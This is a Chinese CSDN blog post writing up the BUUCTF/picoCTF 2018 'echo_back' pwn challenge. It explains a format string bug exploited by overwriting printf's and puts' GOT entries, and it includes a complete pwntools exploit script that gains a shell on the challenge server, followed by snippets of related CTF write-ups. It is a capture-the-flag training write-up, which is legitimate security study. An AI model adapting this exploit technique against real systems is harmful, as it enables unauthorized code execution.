BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)

最新推荐文章于 2023-07-07 11:33:27 发布
最新推荐文章于 2023-07-07 11:33:27 发布
阅读量430 收藏 3
点赞数 2
分类专栏: buuctf刷题 文章标签: 安全 pwn linux ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/124431863
版权

文章目录

PicoCTF_2018_echo_back
例行检查:

在这里插入图片描述

开了部分relro,没开pie,

IDA分析:

函数主逻辑在vul()函数中:
在这里插入图片描述

先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束.

程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入’/bin/sh\x00’触发system,但发现下边会调用puts()函数,这里我考虑将puts()函数的got表改为vuln()函数地址,调用puts()时就会再次返回到vuln(),再次输入即可get shell.

exp:
from pwn import *

def pwn():
		vuln = 0x80485AB
		system = 0x8048460
		#gdb.attach(io)

		io.recvuntil(':')

		payload = p32(elf.got['printf'])
		payload += p32(elf.got['printf']+1)
		payload += p32(elf.got['printf']+2)
		payload += p32(elf.got['printf']+3)
		payload += p32(elf.got['puts'])
		payload += p32(elf.got['puts']+1)
		payload += p32(elf.got['puts']+2)
		payload += p32(elf.got['puts']+3)
		payload += '%64c'
		payload += '%7$hhn'
		payload += '%36c'
		payload += '%8$hhn'
		payload += '%128c'
		payload += '%9$hhn'
		payload += '%4c'
		payload += '%10$hhn'
		payload += '%163c'
		payload += '%11$hhn'
		payload += '%218c'
		payload += '%12$hhn'
		payload += '%127c'
		payload += '%13$hhn'
		payload += '%4c'
		payload += '%14$hhn'


		print len(payload)


		io.sendline(payload)

		io.sendline('/bin/sh\x00')

		io.interactive()
debug = 1
if debug == 1:
		elf = ELF('./PicoCTF_2018_echo_back')
		io = remote('node4.buuoj.cn',26669)
		#io = process('./PicoCTF_2018_echo_back')
		libc = elf.libc
		context(log_level='debug')
		pwn()
else:
	elf = ELF('./PicoCTF_2018_echo_back')
	io = process('./PicoCTF_2018_echo_back')
	libc = elf.libc
	context(log_level='debug')
	pwn()

在这里插入图片描述

喜提flag!!!

Leee333
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
echo_back(xctf)
weixin_43868725的博客
08-16 724
0x0 程序保护和流程 保护: 流程: main() echo_back() 存在一个格式化字符串漏洞。 0x1 利用过程 1.题目保护全开,程序中又没有可用的字符串,函数。所以只能通过格式化字符串漏洞泄露地址,写入有限数据。 2.既然有格式化字符串漏洞,肯定是要泄露栈上的信息。但是由于限制了字符串最长为7,所以只能逐位泄露。 选择使用ida的远程调试,因为可以丢弃alarm()发出的signal。选择在echo_back()的retn处下断点 直到到输入%6$p时在栈上发现了被输出的数据(为什么是
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 825
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2872
BUUCTF picoctf_2018_echo back
[BUUCTF-pwn]——picoctf_2018_echo back
Y_peak的博客
04-03 397
[BUUCTF-pwn]——picoctf_2018_echo back 和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1 思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好 找偏移, 为7 不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。 exploit from pwn import* p=remote('node3.buuoj.cn',27945)
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1269
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
[第五空间2019 决赛]PWN5-BUUCTF-格式化字符串
最新发布
yuqie的博客
07-07 285
第一眼就看到了'system',看一下条件,这里的atoi函数指的是把字符串转换成整数,而'nptr'就是输入的'passwd',再看看另外一个'dword_804C044'表示这个'0x804C044'地址,那意思就是如果输入的'passwd'的值与'dword_804C044'相等就行了,那就改写一下'0x804C044'的值。'指向的内存位置中。这个表示从上面的文件中读取4个字节的字符,并将读取的数据存储到。有canary,栈溢出无望。数了一下,偏移量为10。
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串
qq_73149934的博客
12-10 830
BUUCTF--pwn--[第五空间2019 决赛]PWN5
2020-11-09学习记录:攻防世界pwnecho_back
eeeeeight的博客
11-09 274
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
php中preg_replace_callback函数简单用法示例
12-19
函数内部使用了一个静态变量`$i`来保存计数器,每次调用时递增,并返回格式化的替换字符串。 `preg_replace_callback`与`preg_replace`的主要区别在于,`preg_replace`需要提供一个预定义的替换字符串,而`preg_...
adb echo shell 覆盖_Android ADB命令?这一次我再也不死记了!【简单说】
weixin_31327207的博客
12-29 2687
adb的全称为Android Debug Bridge.是android司机经常用到的工具.但是问题是那么多命令写代码已经够费劲了,过段时间在次使用时压根记不住呀.本次的大餐就是为此开篇的.这一次我们不记命令.要用随时过来ctrl+F呀.哇哈哈哈!本篇ADB集锦不管是常用还是冷门的都有.客观您随意看.记不住没关系,收藏了再说呗.你能在本篇文章中收获什么?adb基本指令Shell AM&PM...
miniSpirit.github.io
03-31
miniSpirit.github.io
[BUUCTF]PWN——mrctf2020_easy_equation(格式化字符串
mcmuyanga的博客
01-28 1116
mrctf2020_easy_equation 附件 步骤 例行检查,64位程序,只开启了nx保护 本地试运行一下,看看大概的情况,%p,那边,明显的格式化字符串漏洞 64位ida载入 只要满足第8行的条件即可获取shell,python算一下得到结果是2 所以这题是用格式化字符串漏洞,将judge上的值修改称即可 利用过程 确定偏移量,补了一个b之后偏移是8 由于64位传参,肯定存在被/x00截断的情况,所以我动调看了一下 我们要做的是将judge里的值修改成2,一开始我是这样写的,pa
picoctf_2018_echo back
z1r0的博客
03-27 451
picoctf_2018_echo back 查看保护 有个格式化漏洞 攻击思路:利用格式化将printf_got改为system,但是只有一次,所以我们可以改fini段,或者将下面的puts_got改成vuln让程序继续运行一下,这样就可以输入/bin/sh来getshell了 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 812
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
半岛铁盒的博客
08-05 407
简单的格式化字符串漏洞题目 32位,开启了canary和nx保护 知道以上条件就可以计算偏移了 得到偏移为11 from pwn import * r=remote('node3.buuoj.cn',25582) x_addr=0x804A02C payload=p32(x_addr)+"%11$n" r.sendline(payload) r.interactive() payload=p32(x_addr)+"%11$n" 因为要使x的值为4,写入的数据由%11$n前面的参数的长度决定,
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1621
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 790
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2278
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值